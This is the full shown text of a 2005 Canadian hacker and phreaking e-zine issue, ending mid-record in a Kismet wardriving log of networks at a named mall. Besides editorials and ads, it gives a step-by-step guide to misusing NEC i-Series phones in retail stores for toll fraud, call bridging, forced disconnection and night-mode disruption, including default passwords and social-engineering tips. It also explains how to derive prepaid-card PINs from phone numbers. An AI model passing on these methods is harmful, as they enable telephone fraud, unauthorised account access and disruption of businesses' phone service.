############################################################################## ############################################################################## ###### ##### ,#### ####ff ###### ###### ########### ###### ##### ,####### ##ff;; ###### ###### ########### ###### ##### ########## #ff;;; ######, ###### ########### ###### ##### ########## ###### #######, ###### ##### ########### ###### ###### ########,###### ########## ########## ###### ###### ############### ########## ########### ######## ###### ###### ############### ########## ############ ######## ###### ###### ######'######## ##### ###### ##### ###### ###### ###### '####### ##### ###### ##### ###### ###### ###### '###### ########### ###### ##### ###### ###### ###### ###### ########### ###### ##### ###### ###### ###### ###### ########### ####### ,E##EE, ,fftt,, ######## ,ffLLii######EE EE######L, ######### ;E####'i########;;#########K ########## ::tt..####KK;f########ff########KK ### ###### ii##EE;;####EE;f########ff########GG .:;, ### ###### .####EE;;####WW.f########EEff####WWiiLL####,. ### ###### ######i ####KKji########Wf''tt;;jjWW######jj ################ ,jj..jj####j KK##GG;;##WWjj,,iiffGG############EE, ################ ::####,,####iiKK##DD'iKKjjEE######################i, ################ ff####iiKK##ff;f##KK,,ffjj########################EE, ###### ';####GGjj##KK,,####;.WW,,ff########################jj, ###### LL####;.####,,####ttGG##;;iiKK######ff..GG##########;: `EE##LLLL##ffff##GG,,####GG..::LLjj ..############## 'WW##,,EE## `KK## EE####KK :;LL############KK ################ `''` ;ii. ,,jj..;;####,, ..GG################f; ################ ,;;EEEE;;, .. jj##################ff' ################ ;;########DD,, jj##################;' ##### ff##########WW ,i##################;' ##### GG############;, KK##############WW:' ##### ;;############ii..################i' ##### `;;##########ttii##############DD' ##### `ii########iiff##############;' ##### `GG######,,ff############DD ##### `;WW####. ;;############;' ##### ff####,, 'ff######jj' ##### tt####;; .;######;, ';##WW,, tt######;, `WW##ff jj########ii SIX F*CKING YEARS WW##GG ##########t' 'L##KK KK######DD' ** SPRING 2005 ** 'DDGG `tjjDDDD" cyb ############################################################################## ############################################################################## O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O | | . randOm wOrds . | | . Introduction . . . . . . . . . . . . . . . . . . . . . . . The Clone . | Contact Information . . . . . . . . . . . . . . . . . . . . The Clone | . Link of the Quarter . . . . . . . . . . . . . . . . . . . . The Clone . | K-1ine Mirrors . . . . . . . . . . . . . . . . . . . . . . The Clone | . Nettwerked Radio . . . . . . . . . . . . . . . . . . . . . The Clone . | 780 Records Corp . . . . . . . . . . . . . . . . . . . . . The Clone | . Voodoo Magick Boxes . . . . . . . . . . . . . . . . . . . . The Clone . | K-1ine Goes Wheneverly . . . . . . . . . . . . . . . . . . Nettwerked | . . | | . . | dOcuments | . . | O2 - PREPA1D CARD P1N PHREAK1N F0R THE MASSES . . . . . . . Acid Data | . Phreaking the NEC i-Series phone systems . . . . . . . . . . War . | West Ed Mall Wifi Scan: Revisited . . . . . . . . . . . . . Fr0st | . Undressing Cryptography . . . . . . . . . . . . . . . . . . Aestetix . | The Guide to Using Google to Get Free Confz . . . . . . . . Aftermath | . The Inevitable Crash of Society . . . . . . . . . . . . . . Cyburnetiks. | Datapac Hacker's Kit: DataCrack Source Code . . . . . . . . Aftermath | . Datapac Hacker's Kit: DataSkan Source Code . . . . . . . . . Aftermath . | If I Were President . . . . . . . . . . . . . . . . . . . . DoobieEx | . Awstats exploit "shell" . . . . . . . . . . . . . . . . . . Omin0us . | How to brute force MSSQL . . . . . . . . . . . . . . . . . . H4v3n | . SQL Brute Source Code . . . . . . . . . . . . . . . . . . . H4v3n . | | . . | cOnclusiOn | . . | Credits . . . . . . . . . . . . . . . . . . . . . . . . . . The Clone | . Shouts . . . . . . . . . . . . . . . . . . . . . . . . . . The Clone . | | O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O Introduction: It was May 22nd 1999 and K-1ine magazine had survived its one month anniversary. A new idea of mine had spawn out of bordem, and I felt it was time to test it out. That idea was Nettwerked. The idea was that Nettwerked would, over time, act as this country's top Internet phone phreaking resource. At this point Nettwerked was nothing but a few low-tech hacking articles, some of my own hand scans, and a few miscellaneous articles I wrote on telecom systems. It wasn't much but it definitely was better than the unbearable "boxing" sites with ripped off articles from LOD (Legion of Doom) technical journals. One thing I definitely didn't want was to make Nettwerked one of those sites. They lacked originality, creativity, and quite frankly A FUCKING CLUE about the current (POTS/VOIP) telephone networks. Nettwerked soon grew with my own wacky and wild phreaking articles, and naturally the outside contribution of phreaking articles to this site also grew. Before I knew it Nettwerked filled itself with over 100 telecommunications related articles, forty-something issues of K-1ine Magazine, Elcotel Research (an insanely large research project into Elcotel-based COCOT Payphones) Flex Technology Research, a popular discussion board, a monthly Nettwerked Meetings page, and a weekend Radio Show. It's been 6 years. This love child of mine, Nettwerked, has had its growing pains, was nearly shut down after fears (see: paranoia) of a post-Bush New World Order (thanks H410g3n for convincing me it was a bad idea), and has grown into a large community of friends who share a common goal; learning as much as possible about technology - at all costs. Thank you to everyone who have made this dream into a reality. I look forward to sharing another 6 years and more with you all through Nettwerked, K-1ine, Hack Canada, and any other Internet project/site that may just happen to pop up in the future. Remember though, all of this is only made possible by contribution. Without people giving a shit Nettwerked would cease to exist. Contribute your original files to Nettwerked/Hack Canada/K-1ine, contribute your original music to Nettwerked Radio, discuss technology on the discussion board, come to our meetings, buy a Voodoo Magick Box, link to the web-site. That is how *you* support our thriving Canadian H/P scene! Enjoy the Spring Issue of K-1ine (#47)... Six F*cking Years! Power to the people. -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O Contact Information; |*> Comments/Questions/Submissions: theclone@hackcanada.com |*> Check out my site: (Nettwerked) http://www.nettwerked.net |*> Check out the Web-forum: http://board.nettwerked.net/ -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O Link of the Quarter: Every quarter I post one really great "link of the quarter" on each issue of K-1ine magazine. The link can be anything in the technology industry, music scene, rave scene, punk scene, or even a good article you read on a news site. I'll be taking submissions via e-mail or IRC right away; so get your links in and maybe you'll see it in the next issue of K-1ine! For the Spring 2005 issue of K-1ine, the link of the quarter is: http://www.phreakvidz.com Featuring full length telephone phreaking videos such as Kevin Poulsen on 'Unsolved Mysteries', 'Central Office Tour Video', and lastly the Masters of Deception's 'Phiber Optik' in a documentary called 'Unauthorized Access'. Submitted by: The Clone -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O K-1ine Magazine Mirrors: WIRETAPPED "Wiretapped.net is an archive of open source software, informational textfiles and radio/conference broadcasts covering the areas of network and information security, network operations, host integrity, cryptography and privacy, among others. We believe we are now the largest archive of this type of software and information, hosting in excess of 20 gigabytes of information mirrored from around the world." Now mirrored in two places, one in Belgium and another in Sydney. http://www.mirrors.wiretapped.net/security/info/textfiles/k1ine/ HACK CANADA "Hack Canada is the source for Canadian hacking, phreaking, freedom, privacy, and related information." http://www.hackcanada.com/canadian/zines/k_1ine/index.html SECURITY-CORE "Security-Core mirrors K-1ine.. and that's about it so far." http://security-core.com/modules.php?op=modload& name=Downloads&file=index&req=viewdownload&cid=5 .: (.dtors) :. "we look good... in our new town" - Omin0us' Security website http://dtors.ath.cx/index.php?page=k1ine -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O Nettwerked Radio (Undergr0und Radio and Music every weekend!): Tune into this critically acclaimed radio show on: Saturday and Sunday from: 12:00am - 3:00am (MST). To listen, please tune in to: http://68.151.33.191:8000/listen.pls If you're not sure whether the show is on, just visit nettwerked.net, and look at the Radio section. If you see lime green "ONLINE", then we are live. You can listen in using Winamp, XMMS, or anything that will play Winamp streaming audio. We thank you for your support and hope that you tune in, give your feedback, and make those requests! -------------------------------------------------------- Contribute your music to Nettwerked Radio, and be heard: -------------------------------------------------------- Do you have your own band? Are you a solo artist? Do you make your own music on your computer, or with regular instruments? Be heard! Nettwerked Radio, on from 12AM-3AM (MST) every Saturday and Sunday, is now accepting submissions of YOUR original music for play. We accept MP3 or OGG formats. If you submit your music, be sure to include information on the band, and any information; such as location, and history. Nettwerked Radio will play your music and advertise your artist information! Nettwerked Radio is a great way to be heard without having to pay out for advertising, or passing out flyers, etc. We respect your copyright too. We will only play your songs when you want them played. We will not duplicate, share or otherwise pirate your songs. All interested artists please send your music and information to: the.clone@gmail.com For more information visit: http://www.nettwerked.net/radio/ -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O 780 Records Corporation... from the people who brought you Nettwerked Radio. 780 Records Corporation is a 100% independent record label focused on helping independent, signed and unsigned artists get a voice. We are helping artists who produce music in various genres (punk, rock, electronic, etc.) sell and distribute their music to the global scene. At 780 Records Corporation believe strongly in an artists ability to make a living, and control their music. This is a challenging thing in a world where large music labels do the exact opposite. As a record label, we will promote your music, your cds, and more. Our contracts plan to be about freedom for the artist (unlike many of the large labels you see out there who control the lives of the artists), and about being heard. Nothing is more important to us than that. We have unofficially adopted Google's famous business slogan: "Don't be evil". We feel "Don't be evil" is not only an impor- tant part of business, but an important part of life in general. 780 Records Corporation is also a supporter of 'Downhill Battle', a non-profit organization working to support participatory culture and build a fairer music industry. We plan to contribute free banner space, and donations to this very important organization who really do help independent artists across the globe. (Downhill Battle is available at: http://www.downhillbattle.org) For more information on 780 Records, or to find out how you can be a part of 780 Records visit: http://780.digaserve.com (soon to be http://www.780Records.com). -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O Voodoo Magick Boxes: Voodoo Liquidation! - Nettwerked.net is pleased to announce the return of the Voodoo Magick Boxes! We are selling off the last of these fine machines, and with a fine price tag. We're selling for 50% less than their original cost! Buy a Voodoo Machine now: http://www.nettwerked.net/voodoo.html Price: $50.00 (US) + $12.00 (US) shipping. We accept PayPal as a main form of payment, but we also accept Paystone as a payment processor. For questions, please contact: theclone@hackcanada.com. Thank you for your interest in this incredible "wetware" product, and we hope you purchase one soon. -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O Nettwerked.net: K-1ine magazine goes wheneverly [ For Immediate Release ] Thursday, May 12, 2005: - Edmonton, Alberta -- In a decision that is sure to make headlines; Nettwerked has announced that 'K-1ine', Canada's longest running hacker, phreak, electr- onics, and political magazine has been turned into one that will now be publ- ished wheneverly. In its beginning, K-1ine initially started out as a magazine that was released whenever its only editor and major writer, The Clone, had the time to piece the beautiful ascii art filled digital pages with everything that an underground publication should have. However, after approximately one year, K-1ine quickly grew into a magazine that had many contributing writers and artists, so The Clone decided that keeping K-1ine as a release that came out rarely certainly was not going to cut it for his readers. He wanted to have something that all HackCanada.com / Nettwerked.net visitors could look forward to once a month. So in July of 2000, K-1ine turned into a monthly release, and stayed that way until three years later in the summer of two-thousand and three when K-1ine went quarterly. And now it seems we have to go wheneverly. What does that mean? It means we'll release issues whenever we feel we have received an acceptable amount of article submissions. Why? Well in the past several months it has become increasingly difficult to gather enough high quality articles within a quarter to justify a K-1ine release. We feel this is the only way we can keep K-1ine from going under. Much like Phrack Magazine in the United States eventually did, K-1ine will most likely have 'zine issue releases once or twice a year after the Spring 2005, K-1ine #47 release. We hope with this more laid back approach to K-1ine, we can make K-1ine even more high quality, and of course more special. Starting after #47, K-1ine will follow the newly implemented wheneverly format, and will contain all the great articles and stories that you've grown to love from the magazine that changed the face of the Canadian hacking / phreaking scene forever. With the gathering of issues over a longer period of time, we hope this means K-1ine's wheneverly releases are much larger, and more elite than the previous quarterly issues. Upcoming Issues: * Whenever 200X: K-1ine 48 * Whenever 200X: K-1ine 49 * Whenever 200X: K-1ine 50 (50TH ANNIVERSARY ISSUE - promotional items included) Sincerely, The Clone (Editor-In-Chief) -- Forward Looking Statements: The Nettwerked.net website contains forward looking statements that are based upon current expectations. Actual results could differ materially from those projected in the forward looking statements as a result of various risks and uncertainties including, among others, the timely introduction and acceptance of new products, costs associated with new product introductions, the transition of products to new hardware configurations and platforms and other factors, including those discussed in Nettwerked's annual and quarterly reports on file with the Kanada R3venue /\gency. This information should be read in conjunction with Nettwerked's most recent Registration Statement on phile with the Kanada R3venue /\gency, which contain a more detailed discussion of Nettwerked's business including risks and uncertainties that may affect future results; such as the fucking apocalypse. Nettwerked does not undertake to update any forward looking statements, because quite frankly we are lazy. This document is Copyright (c) 2005, Nettwerked. All Rights Preserved in M.S.G. ### -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O bbiab, things to do, people to screw family? a c i d d a t a . n e t p r e s e n t s [ O2 - PREPA1D CARD P1N PHREAK1N F0R THE MASSES ] _____________ | ___ | | |___| O2 | |___________/ O2 can do .. [ Intro ] A few weeks ago i bought a new o2 ( o2-online.de ) prepaid card. I deliberated if it is possible to get the pin from my phone- number and i looked a while on my number and after a while i saw something interesting. [ Pin & phonenumber ] I add the two last 3-digit numbers together and after this i got a 4-digit number - my pin. Here is the simple turn: ( with a changed phonenumber just for example ) the number: 0176 12 424 754 add it: 424 + 754 the pin: 1178 [ Last words ] I dont know if this is a coincidence but i dont beleave that. Anyway the two 3-digit numbers, when you add them, must become a 4-digit number so the range of numbers in this case is minimal. O2 also have different numbers like 0179 and so on as prefix number with other different simple ways maybe, i dont know.. phreak it out and change your pin. (-; [ Greetings ] Greetings are going out to Security-AG, Koksclan.de, sm0g23er, Simoni, Jay-K, D-Nought and all my other good friends. a c i d d a t a . n e t 2 0 0 5 -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O i caused an accident once in your pants Phreaking the NEC i-Series phone systems by war The i-Series of desktop fones are manufactured by NEC. The i-Series includes the 28i, 124i and 384i phones. These phones were built by NEC for use in an office environment, and they perform satisfactorily in that role. NEC i-Series phones are used by a number of small and large businesses in North America. This article might, possibly, hopefully, give you some insight into power-use (or phreaking, whatever) of the i-Series fones. That's the idea, anways. I'm assuming a previous basic knowledge of how PBX systems work. The i-Series phones have quite a large array of features, too large to explain every feature in detail in one article. A quick overview of some of the i-Series features: Alarm Automated Attendent (Voice Announcer) Background Music Barge In (Emergency Interrupt-ish) Call Forwarding Follow-me Off-Premise DND Override Call Waiting/Camp On Conferencing MeetMe Internal/External Conferencing MeetMe Internal/External Paging Directory Dialing Internal/External Paging Programmable Function Keys Soft Keys (on select models) Reverse Voice Over Room Monitoring Tandem Trunking Voice Mail Physical Access As the topic says, let's first assume you have physical access to the actual phone. So, you may ask, "How do I gain physical access?" It's not that hard, really. If you spot an i-Series phone in a shop, you could simply ask them, "Can I use your phone?" It's not hard. So. Let's look at a couple useful features of the wonderful i-Series fone system. Call Forwarding Probably one of the most useful (in-my-opinion) options on the i-Series phones is the "Call-Forwarding" feature and Call-Forwarding Off-Premise feature. The i-Series phones have quite a few options when it comes to call-forwarding. You can forward your calls to voicemail, forward your calls to another extension, or forward to an external number. Call-forwarding also ties in with the Do-Not-Disturb (DND) functions of the phone. Call-Forwarding There are a couple call-forwarding modes. They are: Call-Forwarding when Busy or Not-Answered Call-Forwarding Immediate -immediately forwards your call using the given method without ringing the line at all Call-Forwarding when Not Answered Call-Forwarding Immediate with Both Ringing -immediately forwards your call using the given method, but still rings your line. Call-Forwarding to Voice Mail If you needed to active call-forwarding on a i-Series phone (once again assuming physical access), simply dial: 1. [*] + [2] 2. Dial Call Forwarding condition: 1 - VoiceMail 2 - Busy or Not Answered 4 - Immediate 6 - Not Answered 7 - Immediate with Both Ringing 0 - Cancel Call-Forwarding 3. Then dial the extension, Voice Mail master number, or simply press the [Voice Mail] programmable key (if there is one.) 4. Dial Call Forwarding Type 2 - All calls 3 - Outside calls only 4 - Intercom calls only So, overall, if you wanted to say...forward all your calls immediately to extension 555, you would dial: [*][2] + [4] + [5][5][5] + [2] + hangup Call-Forwarding Off-Premise Call-Forwarding Off-Premise can be used to forward your calls to another number. There are quite a few different ways to exploit this feature, assuming local access at an i-Series fone. To turn on Call-Forwarding Off-Premise, dial: 1. [*] + [2] 2. [6] + Dial line access code { Line access codes are: [9] Automatic Route Selection (ARS) / Trunk Group Routing Dialing "9" for an outside line is probably the most common way known by people using PBX systems to get an outside line. "9" is the extension commonly designated for Automatic Route Selection - the fone system chooses what line you are going to use for you. [8][0][4] + Line Group (1-9 , 01-99, 001-128) 804x dialing is Line Group Selection dialing. You can manually select the outgoing trunk group that you want your call to be placed via. For example, if there is more than one business at in your office, you might have a trunk group "1" for the "ABC Packaging Corp", and a trunk group "2" for the "BCD Shipping Co." If you were calling out using "9" on a phone belonging to the "BCD Shipping Co., you would be actualliny dialing "8042". That would route you onto the BCD Shipping Co. trunk group. But, you could also theoretically dial "8041" to make an outgoing call over the trunk group assigned to ABC Packaging. (I hope that makes sense). [#][9] + Line Number Selection You can select an absolute line using "#9". You could dial "#9" + "05" to get line number 05. } 3. Then dial the external number where you want your calls to be forwarded. 4. Hangup. Call-Forwarding Off-Premises is a quick-n-dirty way to get an overnight extender. If you were to walk up to a Future Shop employee, and ask them to use their phone, you might be able to set it to Call-Forward Off-Premises. But, chances are that it would be noticed the next day. If you want to maximize the length of time before the Call-Forwarding is removed, there are options to be considered. Forward to the Operator. If you're forwarding to the operator, and then getting him/her to place the call, you aren't going to be endangering your favorite bridge or your friend. Find a remote phone that rarely receives calls. In large retail outlets (Future Shop, Best Buy, Canadian Tire, etc) there are often departments that are lower traffic then others. For example, appliances. How many people go to Future Shop to buy appliances? None, you say? Well then, if you're going to pick a fone to set up as an extender, might I suggest you use a phone in the appliance department? Chances are, it's going to recive less traffic which means less chance of your extender getting taken down. +++ Forced Trunk Disconnection While still on the physical access topic...Force Trunk Disconnection. If for any unknown reason, you needed to release a line, simply dial up the line using: [#][9] + line number (ie 01, 02, 03, 005, whatever) + [*][3] That will disconnect (read abruptly terminate) the connection. I'm sure you can figure out a good use for that. +++ Night Service Mode Ever find a nice afterhours voicemail system that you just can't wait until the evening to play with? Even if it means cutting off legitimate users? No, me either. But, with Night Service Mode, you can do just that. Switching to Night Service Mode during the daylight hours, especially in a busy store, usually makes incoming callers upset. People calling in get voicemail. And such. But, it's a convenient (for you) way in a pinch to get access to an afterhours system. To physically turn on Night Service Mode from a phone, just dial: 1. [8][1][8] + Night Service Password The default Night Service Password is "0000". 2. Dial the Night Service Mode 0 Day mode 1 Night mode 2 Midnight mode 3 Rest mode 4 Day 2 mode 5 Night 2 mode 6 Midnight 2 mode 7 Rest 2 mode So, to turn on Night Service Night Mode during the day at your (least?) favorite local Staples (or whatever uses i-Series) simply dial: [8][1][8] + [0][0][0][0] + [1] That is, of course, assuming the password is default. +++ Outgoing Calls Some i-Series phone systems have toll restrictions. To override toll restrictions, simply dial: [8][7][5] + Password As well, some systems that use ARS (Automatic Route Selection) are coded. Many larger companies like Nortel that have high volumes of calling often code their PBX systems so that calls can be catalogued effectively, and to discourage over-use and fraudulent use. If the systems you are using is using coded ARS, when you dial "9", you'll get a dialtone and can dial your number as normal. But, after you have dialed the number, you will be dropped to another dialtone and will have to enter the ARS code. +++ Bridging and Social Engineering Bridging is the act of placing two outside callers in a conference call, and then dropping out of the call. Let's say that two of your phreak buddies decide that they want to talk. But, maybe they don't want to pay for it. Simple enough. You just walk down to your local K-Mart, and find an remote phone. Then, wait for one of your buddies to call up the local K-Mart's 800 number and ring your phone. When he does, simply press the [Conf] button on your i-Series phone. Then, wait for your second buddy to ring your line. When he does, press [Conf] twice. This will connect the two parties. To drop out of the conference and leave the two parties talking, simply press [HOLD] + [#][8]. Now on the other side of the coin. Many companies set up tandem trunking conferences to allow outside employees such as service technicians or other field workers to talk to each other. You could social engineer an secretary into creating a bridging line to talk on. If she doesn't know how, now you can walk her through it, since you know. Many secretaries also refer to bridging conferences as "Tandem Conferences", "Tandem Trunking Lines", or something similar to that. [ BlackRatchet wants to remind you that a 'Tandem Trunking Line' is not a technical term. A trunk and a line are different. Not the same. He really, REALLY wanted me to note that. So here it is. ] +++ That's about it. -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O what the FUCK is a sex token??/ you're too young! cover eyes lol * Cygnus opens eyes!! hehe Cygnus: for peep shows, et al Cygnus - it's when a mommy loves a daddy and he puts his bird into her bee lol clone, stfu ################################################ # # # West Ed Mall Wifi Scan: Revisited # # Article By: fr0st # # Original Article By: cybersk4nk # # Contact Info: fr0sty (at) shaw (dot) ca # # http://blondebomber.no-ip.com # # # ################################################ After reading the original article by cybersk4nk, I knew I had to do a follow up so here it is. The Story: I decide to start my adventure of the war walk in Starbucks that is located in and beside Chapters in West Edmonton Mall. Sitting in the Starbucks gave me a little time to get everything working and everything set up. So put my laptop into my bag and off I went. The Setup: The laptop I was using for this WiFi scan was a IBM ThinkPad T21, running Free BSD 5.3, Kismet 2005 01 R1, with a prism2.5 SMC2532W-B. The SMC2532W-B is a 200mW card, and let me tell you, this card packs a lot of power. The Results: Network 1: "3dbcamwireless" BSSID: "00:40:05:55:17:45" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 08 WEP : "Yes" Maxrate : 22.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 2 First : "Wed Mar 30 05:15:41 2005" Last : "Wed Mar 30 06:02:12 2005" Network 2: "5356ep" BSSID: "00:0F:C8:00:15:13" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "Yes" Maxrate : 36.0 LLC : 5 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 5 First : "Wed Mar 30 05:17:26 2005" Last : "Wed Mar 30 06:02:10 2005" Network 3: "linksys" BSSID: "00:0F:66:90:CE:9A" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 0.0 LLC : 3 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:17:28 2005" Last : "Wed Mar 30 05:46:38 2005" Network 4: "linksys" BSSID: "00:0E:35:79:D0:DE" Type : unknown Carrier : 802.11b Info : "None" Channel : 00 WEP : "No" Maxrate : 18.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:17:29 2005" Last : "Wed Mar 30 05:17:30 2005" Network 5: "" BSSID: "00:06:B1:14:3C:AB" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 17 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 17 First : "Wed Mar 30 05:17:32 2005" Last : "Wed Mar 30 06:03:44 2005" Network 6: "111" BSSID: "00:0F:66:D6:5C:FC" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 54.0 LLC : 8 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:18:34 2005" Last : "Wed Mar 30 06:04:34 2005" Network 7: "GdbuzzAP" BSSID: "00:09:5B:AA:07:A8" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 10 WEP : "Yes" Maxrate : 0.0 LLC : 2 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 3 First : "Wed Mar 30 05:18:50 2005" Last : "Wed Mar 30 06:05:08 2005" Network 8: "" BSSID: "00:06:B1:14:44:EF" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 02 WEP : "No" Maxrate : 11.0 LLC : 25 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 25 First : "Wed Mar 30 05:19:02 2005" Last : "Wed Mar 30 06:08:26 2005" Network 9: "linksys" BSSID: "00:06:25:98:7A:0C" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 15 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 16 First : "Wed Mar 30 05:20:39 2005" Last : "Wed Mar 30 06:08:37 2005" Network 10: "default" BSSID: "00:0D:88:2F:F1:A7" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 03 WEP : "Yes" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:24:05 2005" Last : "Wed Mar 30 05:37:06 2005" Network 11: "151" BSSID: "00:A0:F8:46:6A:BB" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 5 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 5 First : "Wed Mar 30 05:24:49 2005" Last : "Wed Mar 30 05:35:44 2005" Network 12: "WEMiSphere" BSSID: "00:0F:C8:00:15:28" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 9 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:25:19 2005" Last : "Wed Mar 30 05:35:52 2005" Network 13: "FLHGuest" BSSID: "00:0F:C8:00:15:29" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 9 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:25:20 2005" Last : "Wed Mar 30 05:35:50 2005" Network 14: "WEM_Conference" BSSID: "00:0F:C8:00:15:2A" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 9 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:25:20 2005" Last : "Wed Mar 30 05:35:50 2005" Network 15: "SMC" BSSID: "00:04:E2:94:5E:14" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:26:15 2005" Last : "Wed Mar 30 05:26:15 2005" Network 16: "111" BSSID: "00:0F:66:D6:5C:F9" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 54.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 3 First : "Wed Mar 30 05:26:20 2005" Last : "Wed Mar 30 05:29:24 2005" Network 17: "poswireless" BSSID: "6E:BF:53:EA:12:39" Type : ad-hoc Carrier : 802.11b Info : "None" Channel : 11 WEP : "Yes" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:26:21 2005" Last : "Wed Mar 30 05:29:15 2005" Network 18: "" BSSID: "00:06:25:22:A0:2F" Type : probe Carrier : 802.11b Info : "None" Channel : 00 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:28:17 2005" Last : "Wed Mar 30 05:28:17 2005" Network 19: "" BSSID: "00:01:4A:10:68:4C" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:31:17 2005" Last : "Wed Mar 30 05:31:17 2005" Network 20: "170" BSSID: "00:A0:F8:80:94:F6" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:32:01 2005" Last : "Wed Mar 30 05:32:01 2005" Network 21: "chan international" BSSID: "00:0D:88:95:1A:88" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "Yes" Maxrate : 36.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 2 First : "Wed Mar 30 05:32:11 2005" Last : "Wed Mar 30 05:32:42 2005" Network 22: "170" BSSID: "00:A0:F8:80:96:E3" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:32:21 2005" Last : "Wed Mar 30 05:33:42 2005" Network 23: "170" BSSID: "00:A0:F8:80:94:72" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 2 First : "Wed Mar 30 05:32:24 2005" Last : "Wed Mar 30 05:32:41 2005" Network 24: "170" BSSID: "00:A0:F8:80:93:DA" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:32:25 2005" Last : "Wed Mar 30 05:32:25 2005" Network 25: "default" BSSID: "00:11:95:2C:8D:22" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "No" Maxrate : 0.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 